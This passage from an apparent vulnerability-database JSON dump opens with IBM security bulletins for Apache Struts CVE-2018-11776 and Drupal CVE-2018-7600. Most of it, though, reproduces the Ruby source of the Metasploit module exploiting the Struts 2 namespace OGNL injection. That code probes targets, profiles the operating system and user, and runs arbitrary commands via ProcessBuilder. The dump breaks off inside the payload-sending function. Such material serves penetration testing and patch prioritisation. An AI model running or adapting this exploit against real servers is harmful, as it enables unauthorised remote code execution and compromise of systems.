\n \nIBM Content Collector for SharePoint | 4.0.1 | \n\nUse IBM Content Collector for SharePoint 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for IBM Connections | 4.0.1 | \n\nUse IBM Content Collector IBM Connections 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-12T12:55:02", "type": "ibm", "title": "Security Bulletin: Content Collector for Email, File Systems, Microsoft SharePoint and IBM Connections are affected by a publicly disclosed vulnerability found by vFinder: Eclipse Jetty", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-11-12T12:55:02", "id": "BF4651008A331C7D796A1E09F830D542352CF251871DBEED396D2CE654058F5A", "href": "https://www.ibm.com/support/pages/node/730391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:46:41", "description": "## Summary\n\nIBM Sterling Order Management uses Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 through 9.5.0 \n\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**\n\n| \n\n**_Security Fix Pack*_**\n\n| \n\n_Remediation/First Fix_ \n \n---|---|--- \n \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n| \n\n**_9.5.0-SFP3_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.4.0\n\n| \n\n**_9.4.0-SFP4_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.3.0\n\n| \n\n**_9.3.0-SFP6_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.1\n\n| \n\n**_9.2.1- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.0\n\n| \n\n**_9.2.0- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.1.0\n\n| \n\n**_9.1.0- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T15:25:01", "type": "ibm", "title": "Security Bulletin: Apache Struts Vulnerability Can Affect IBM Sterling Order Management (CVE-2018-11776)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-10-17T15:25:01", "id": "20D334DF630C3C7B5490CC97E9EB2E76B4108FD56753DB19039AF6E0DE79CB63", "href": "https://www.ibm.com/support/pages/node/730273", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:44:34", "description": "## Summary\n\nThere is a vulnerability in Apache Struts which the IBM FlashSystem\u2122 V840 is susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nStorage Node machine type and models (MTMs) affected:9840-AE1 and 9843-AE1\n\nController Node MTMs affected: 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1\n\nSupported storage node code versions which are affected\n\n * VRMFs prior to 1.4.8.1\n * VRMFs prior to 1.5.2.1\n\nSupported controller node code versions which are affected\n\n * VRMFs prior to 7.8.1.8\n * VRMFs prior to 8.1.3.4\n\n## Remediation/Fixes\n\nMTMs | VRMF | APAR | Remediation/First Fix \n---|---|---|--- \n \n**Storage nodes**:\n\n9846-AE1 &amp; 9848-AE1\n\n**Controller nodes**:\n\n9846-AC0, 9846-AC1, 9848-AC0, &amp; 9848-AC1\n\n| \n\nCode fixes are now available, the minimum VRMF containing the fix depending on the code stream:\n\n_Fixed Code VRMF_\n\n1.5 stream: 1.5.2.1\n\n1.4 stream: 1.4.8.1\n\n_Controller Node VRMF_\n\n8.1 stream: 8.1.3.4\n\n7.8 stream: 7.8.1.8\n\n| N/A | FlashSystem V840 fixes for storage node are available @ IBM's Fix Central \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-18T15:05:01", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem V840", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2019-02-18T15:05:01", "id": "47D48C5A9F3802E168F3775B67FEF0A4B25692C1BE0EB29698F35ECDF8F0CD7B", "href": "https://www.ibm.com/support/pages/node/735023", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:55:08", "description": "## Summary\n\nIBM API Connect has addressed the following vulnerabilities. \n \nAPI Connect Developer Portal is impacted by Drupal vulnerability: \n \nDrupal could allow a remote attacker to execute arbitrary code on the system, caused by an error within multiple subsystems. An attacker could exploit this vulnerability using multiple attack vectors to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n \n**CVEID: **[_CVE-2018-7600_](<https://vulners.com/cve/CVE-2018-7600>)** \nDESCRIPTION: **Drupal could allow a remote attacker to execute arbitrary code on the system, caused by an error within multiple subsystems. An attacker could exploit this vulnerability using multiple attack vectors to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/140913_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/140913>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\n**Affected IBM API Connect**\n\n| \n\n**Affected Versions** \n \n---|--- \nIBM API Management| 4.0.0.0-4.0.4.6 \nIBM API Connect| 5.0.6.0-5.0.6.6 \nIBM API Connect| 5.0.7.0-5.0.7.2 \nIBM API Connect| 5.0.8.0-5.0.8.2 \n \n## Remediation/Fixes\n\n**Affected Product**\n\n| \n\n**Addressed in VRMF**\n\n| \n\n**APAR**\n\n| \n\n**Remediation / First Fix** \n \n---|---|---|--- \nIBM API Management \n \n4.0.0.0-4.0.4.6| 4.0.4.6. iFix| LI80057| Addressed in IBM API Connect Developer Portal V4.0.4.6 iFix \n \nFollow this link and find the \"APIConnect-Portal\" \niFix dated on or after 2018/03/28. \n \n[https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&amp;product=ibm/WebSphere/IBM+API+Connect&amp;release=4.0.4.6&amp;platform=All&amp;function=all](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.6.2&platform=All&function=all>) \nIBM API Connect \n \n5.0.0.0-5.0.6.6| 5.0.6.6 iFix| LI80057| Addressed in IBM API Connect Developer Portal V5.0.6.6 iFix \n \nFollow this link and find the \"APIConnect-Portal\" \niFix dated on or after 2018/03/28. \n \n[https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&amp;product=ibm/WebSphere/IBM+API+Connect&amp;release=5.0.6.6&amp;platform=All&amp;function=all](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.6.2&platform=All&function=all>) \nIBM API Connect \n \n5.0.7.0-5.0.7.2| 5.0.7.2 iFix \n| LI80057| Addressed in IBM API Connect Developer Portal V5.0.7.2 iFix \n \nFollow this link and find the \n\"APIConnect-Portal\" \n \niFix dated on or after 2018/03/28. \n \n[https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&amp;product=ibm/WebSphere/IBM+API+Connect&amp;release=5.0.7.2&amp;platform=All&amp;function=all](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.7.0&platform=All&function=all>) \nIBM API Connect \n \n5.0.8.0-5.0.8.2| 5.0.8.2 iFix| LI80057| Addressed in IBM API Connect Developer Portal V5.0.8.2 iFix \n \nFollow this link and find the \"APIConnect-Portal\" \niFix dated on or after 2018/03/28. \n \n[https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&amp;product=ibm/WebSphere/IBM+API+Connect&amp;release=5.0.8.2&amp;platform=All&amp;function=all](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.7.0&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:09:07", "type": "ibm", "title": "Security Bulletin: API Connect Developer Portal is affected by Drupal vulnerability (CVE-2018-7600)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-15T07:09:07", "id": "02D84FEF44D33E0AEFACF9F0F69D208CD35169CED383AB4155C383F596F12961", "href": "https://www.ibm.com/support/pages/node/568925", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-24T16:57:20", "description": "This module exploits a remote code execution vulnerability in Apache Struts version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed via an endpoint that makes use of a redirect action. Note that this exploit is dependant on the version of Tomcat running on the target. Versions of Tomcat starting with 7.0.88 currently don't support payloads larger than ~7.5kb. Windows Meterpreter sessions on Tomcat >=7.0.88 are currently not supported. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.\n", "cvss3": {}, "published": "2018-08-31T18:48:22", "type": "metasploit", "title": "Apache Struts 2 Namespace Redirect OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2023-01-27T15:58:53", "id": "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_NAMESPACE_OGNL-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/struts2_namespace_ognl/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n # Eschewing CmdStager for now, since the use of '\\' and ';' are killing me\n #include Msf::Exploit::CmdStager # https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html\n\n # NOTE: Debugging code has been stripped, but is available in the commit history: a9e625789175a4c4fdfc7092eedfaf376e4d648e\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',\n 'Description' => %q{\n This module exploits a remote code execution vulnerability in Apache Struts\n version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed\n via an endpoint that makes use of a redirect action.\n\n Note that this exploit is dependant on the version of Tomcat running on\n the target. Versions of Tomcat starting with 7.0.88 currently don't\n support payloads larger than ~7.5kb. Windows Meterpreter sessions on\n Tomcat >=7.0.88 are currently not supported.\n\n Native payloads will be converted to executables and dropped in the\n server's temp dir. If this fails, try a cmd/* payload, which won't\n have to write to the disk.\n },\n 'Author' => [\n 'Man Yue Mo', # Discovery\n 'hook-s3c', # PoC\n 'asoto-r7', # Metasploit module\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-11776'],\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],\n ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],\n ],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Automatic detection', {\n 'Platform' => %w{ unix windows linux },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n },\n ],\n [\n 'Windows', {\n 'Platform' => %w{ windows },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n },\n ],\n [\n 'Linux', {\n 'Platform' => %w{ unix linux },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}\n },\n ],\n ],\n 'DisclosureDate' => '2018-08-22', # Private disclosure = 2018-04-10\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\n OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),\n OptBool.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]),\n ]\n )\n register_advanced_options(\n [\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),\n OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ),\n OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ),\n ]\n )\n end\n\n def check\n # METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable\n ognl = \"#_memberAccess['allowStaticMethodAccess']\"\n\n resp = send_struts_request(ognl)\n\n # If vulnerable, the server should return an HTTP 302 (Redirect)\n # and the 'Location' header should contain either 'true' or 'false'\n if resp && resp.headers['Location']\n output = resp.headers['Location']\n vprint_status(\"Redirected to: #{output}\")\n if (output.include? '/true/')\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\n datastore['ENABLE_STATIC'] = false\n CheckCode::Vulnerable\n elsif (output.include? '/false/')\n print_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\")\n datastore['ENABLE_STATIC'] = true\n CheckCode::Vulnerable\n else\n CheckCode::Safe\n end\n elsif resp && resp.code==400\n # METHOD 2: Generate two random numbers, ask the target to add them together.\n # If it does, it's vulnerable.\n a = rand(10000)\n b = rand(10000)\n c = a+b\n\n ognl = \"#{a}+#{b}\"\n\n resp = send_struts_request(ognl)\n\n if resp.headers['Location'].include? c.to_s\n vprint_status(\"Redirected to: #{resp.headers['Location']}\")\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\n datastore['ENABLE_STATIC'] = false\n CheckCode::Vulnerable\n else\n CheckCode::Safe\n end\n elsif resp.nil?\n fail_with(Failure::Unreachable,\"Target did not respond. Please double check RHOSTS and RPORT\")\n end\n end\n\n def exploit\n case payload.arch.first\n when ARCH_CMD\n resp = execute_command(payload.encoded)\n else\n resp = send_payload()\n end\n end\n\n def encode_ognl(ognl)\n # Check and fail if the command contains the follow bad characters:\n # ';' seems to terminates the OGNL statement\n # '/' causes the target to return an HTTP/400 error\n # '\\' causes the target to return an HTTP/400 error (sometimes?)\n # '\\r' ends the GET request prematurely\n # '\\n' ends the GET request prematurely\n\n bad_chars = %w[; \\\\ \\r \\n] # and maybe '/'\n bad_chars.each do |c|\n if ognl.include? c\n print_error(\"Bad OGNL request: #{ognl}\")\n fail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\")\n end\n end\n\n # The following list of characters *must* be encoded or ORNL will asplode\n encodable_chars = { \"%\": \"%25\", # Always do this one first. :-)\n \" \": \"%20\",\n \"\\\"\":\"%22\",\n \"#\": \"%23\",\n \"'\": \"%27\",\n \"<\": \"%3c\",\n \">\": \"%3e\",\n \"?\": \"%3f\",\n \"^\": \"%5e\",\n \"`\": \"%60\",\n \"{\": \"%7b\",\n \"|\": \"%7c\",\n \"}\": \"%7d\",\n #\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal.\n #\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround?\n #\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\n #\"\\\\\":\"%5c%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\n }\n\n encodable_chars.each do |k,v|\n #ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)\n ognl.gsub!(\"#{k}\",\"#{v}\")\n end\n return ognl\n end\n\n def send_struts_request(ognl, payload: nil, headers: nil)\n ognl = \"${#{ognl}}\"\n vprint_status(\"Submitted OGNL: #{ognl}\")\n ognl = encode_ognl(ognl)\n\n if headers.nil?\n headers = {'Keep-Alive': 'timeout=5, max=1000'}\n end\n\n if payload\n vprint_status(\"Embedding payload of #{payload.length} bytes\")\n headers[datastore['HEADER']] = payload\n end\n\n # TODO: Consider embedding OGNL in an HTTP header to hide it from the Tomcat logs\n uri = normalize_uri(target_uri.path, \"/#{ognl}/#{datastore['ACTION']}\")\n\n r = send_request_cgi(\n #'encode' => true, # this fails to encode '\\', which is a problem for me\n 'uri' => uri,\n 'method' => datastore['HTTPMethod'],\n 'headers' => headers\n )\n\n if r && r.code == 404\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\")\n end\n\n return r\n end\n\n def send_profile\n # Use OGNL to extract properties from the Java environment\n\n properties = { 'os.name': nil, # e.g. 'Linux'\n 'os.arch': nil, # e.g. 'amd64'\n 'os.version': nil, # e.g. '4.4.0-112-generic'\n 'user.name': nil, # e.g. 'root'\n #'user.home': nil, # e.g. '/root' (didn't work in testing)\n 'user.language': nil, # e.g. 'en'\n #'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing)\n }\n\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|('#{rand_text_alpha(2)}')|\n properties.each do |k,v|\n ognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'|\n end\n ognl = ognl[0...-4]\n\n r = send_struts_request(ognl)\n\n if r.code == 400\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\")\n elsif r.headers['Location']\n # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'\n # Extract the OGNL output from the Location path, and strip the two random chars\n s = r.headers['Location'].split('/')[1][2..-1]\n\n if s.nil?\n # Since the target didn't respond with an HTTP/400, we know the OGNL code executed.\n # But we didn't get any output, so we can't profile the target. Abort.\n return nil\n end\n\n # Confirm that all fields were returned, and non include extra (:) delimiters\n # If the OGNL fails, we might get a partial result back, in which case, we'll abort.\n if s.count(':') > properties.length\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\")\n end\n\n # Separate the colon-delimited properties and store in the 'properties' hash\n s = s.split(':')\n i = 0\n properties.each do |k,v|\n properties[k] = s[i]\n i += 1\n end\n\n print_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" +\n \" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\")\n return properties\n else\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\")\n end\n end\n\n def profile_os\n # Probe for the target OS and architecture\n begin\n properties = send_profile()\n os = properties[:'os.name'].downcase\n rescue\n vprint_warning(\"Target profiling was unable to determine operating system\")\n os = ''\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\n end\n return os\n end\n\n def execute_command(cmd_input, opts={})\n # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.\n if cmd_input.include? ';'\n print_warning(\"WARNING: Command contains bad characters: semicolons (;).\")\n end\n\n os = profile_os()\n\n if os && ((os.include? 'linux') || (os.include? 'nix'))\n cmd = \"{'sh','-c','#{cmd_input}'}\"\n elsif os && (os.include? 'win')\n cmd = \"{'cmd.exe','/c','#{cmd_input}'}\"\n else\n vprint_error(\"Failed to detect target OS. Attempting to execute command directly\")\n cmd = cmd_input\n end\n\n # The following OGNL will run arbitrary commands on Windows and Linux\n # targets, as well as returning STDOUT and STDERR. In my testing,\n # on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.\n\n vprint_status(\"Executing: #{cmd}\")\n\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|\n ognl << %q|(#p.redirectErrorStream(true)).|\n ognl << %q|(#process=#p.start()).|\n ognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).|\n ognl << %q|(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r)).|\n ognl << %q|(#r.flush())|\n\n r = send_struts_request(ognl)\n\n if r && r.code == 200\n print_good(\"Command executed:\\n#{r.body}\")\n elsif r\n if r.body.length == 0\n print_status(\"Payload sent, but no output provided from server.\")\n elsif r.body.length > 0\n print_error(\"Failed to run command. Response from server: #{r.to_s}\")\n end\n end\n end\n\n def send_payload\n data_header = datastore['HEADER']\n if data_header.empty?\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a 